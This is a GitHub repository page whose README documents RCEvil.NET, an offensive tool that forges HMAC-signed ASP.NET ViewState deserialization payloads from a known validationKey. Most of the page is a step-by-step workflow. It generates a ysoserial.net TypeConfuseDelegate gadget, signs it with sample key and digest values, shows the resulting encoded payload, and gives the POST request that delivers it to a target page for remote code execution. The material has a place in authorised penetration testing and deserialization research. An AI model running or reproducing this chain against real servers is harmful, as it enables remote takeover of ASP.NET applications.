Skip to content
No description, website, or topics provided.
Branch: master
Clone or download
Latest commit 5b8e6b0 Apr 21, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
RCEvil.NET
RCEvil.NET.sln RCEvil.NET Public v1 Apr 20, 2019
README.md Update README.md Apr 20, 2019

README.md

RCEvil.NET

RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector.

Prerequisites

  1. Visual Studio Community
  2. Local installation of ysoserial.net:

Usage

  1. Build your payload in ysoserial.net:
ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -o base64 -c "calc.exe"
  1. Sign the payload using RCEvil.NET:
RCEvil.NET.exe -u [URL] -v [VALIDATION_KEY] -m [DIGEST_TYPE] -p [YSOSERIAL.NET_PAYLOAD]
  1. Direct the payload to the target ASPX page

Examples

Generate base payload in ysoserial.net:

ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -o base64 -c "calc.exe" /wEyxBEAAQAAAP////8...

Sign ysoserial.net payload with an HMAC using RCEvil.NET:

RCEvil.NET.exe -u /Default.aspx -v 000102030405060708090a0b0c0d0e0f10111213 -m SHA1 -p /wEyxBEAAQAAAP////8...

 -=[ ViewState Toolset ]=-

 URL: /Default.aspx  
 Digest Algorithm: SHA1  
 ValidationKey: 000102030405060708090a0b0c0d0e0f10111213  
 Modifier: 34030bca

 -=[ Final Payload ]=-

 %2fwEyxBEAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwC...

Finally, send the HMAC-signed ViewState payload to the target:

 POST /Default.aspx HTTP/1.1  
 Host: 192.168.112.148  
 Content-Type: application/x-www-form-urlencoded  
 Content-Length: 3072

 __VIEWSTATE=%2fwEyxBEAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwC...
You can’t perform that action at this time.